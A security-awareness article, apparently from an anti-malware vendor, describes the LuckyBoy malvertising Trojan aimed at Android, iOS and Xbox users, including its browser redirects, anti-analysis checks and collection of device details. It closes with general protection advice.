LuckyBoy Malware

The LuckyBoy Malware is a Trojan that redirects the user's browsers to corrupted sites, such as fake update domains, and gives attackers information to compromise the device. The LuckyBoy Malware targets victims through malvertising (or 'corrupted advertising') content for mobile and gaming environments such as Android, iOS and Xbox. Owners of at-risk devices can protect them with up-to-date and credible security solutions that are prepared to remove the LuckyBoy Malware and should monitor their Web-surfing for symptoms of website redirects.

Unlucky Gamers and Phone Owners in this Trojan's Campaign

Although most Trojans malware researchers see are Windows-favoring, there are exceptions to the rule, like the WireLurker Trojan downloader, the inaccurately-named FakeSpy, and the newest case in question: the LuckyBoy Malware. With a name that comes from its extensive anti-detection-tracking features, the LuckyBoy Malware is a highly-concealed Trojan that targets Xbox users, Apple's iOS devices like iPhones, and the Android mobile device operating systems.

The LuckyBoy Malware's campaign seems that it's 'testing the waters' with its initial forays of semi-limited distribution, which uses advertising tag-based content to infect users of the above OSes. The LuckyBoy Malware's design emphasizes avoidance of detection, both automated and user-based, and the drive-by-download attacks can bypass Trojan-blocking ad security protocols. Although the DSP ad servers are European, affected users tend towards Canadian or American nationality.

The LuckyBoy Malware serves as a high-end browser hijacker that uses a Web beacon in a 1x1 tracking pixel format for redirecting users to corrupted sites. Examples of possible redirects include taking users away from a legitimate update page to a fake one that downloads another Trojan or from a bank login site to a fake login that collects the user's credentials.

Further campaign waves are likely to broaden the LuckyBoy Malware's 'outreach' to victims by expanding the compromised ad tags.

Making One's Luck against a Bad Boy

The LuckyBoy Malware's name is from the global variable-tracking feature it uses, which checks the device for virtual environments, debugging tools, and similar, telltale signs of an analysis environment continuously. It never executes in such an environment and even can stop its script after running for a time. This feature is one of several elements that show that the threat actor behind the LuckyBoy Malware, whoever they are, has non-negligible programming experience and a vested interest in evading detection.

Website redirects aren't the only danger in the LuckyBoy Malware's payload. Although malware analysts have yet to find any in-depth backdoor features, it transfers over some system information to the attackers' servers, such as country codes, touch interface availability, and CPU core numbers. Generalized reconnaissance of this type often is a preliminary for additional attacks that drop other threats onto the system or completely take over the device.

Android, iOS, and Xbox users should pay attention to advertising content and use ad-blocking features when necessary for their safety. Malware experts also recommend users update their respective anti-malware services for optimal detection rates immediately and removing the LuckyBoy Malware as soon as possible.

In almost no time, the LuckyBoy Malware makes itself known as a powerhouse of Trojan engineering that's preying on users with specialized and, often, casual Web-browsing environments. Assuming one's phone isn't endangered by Trojans as much as the average PC might end up hurting users in a big way in 2021, depending on this threat's campaign.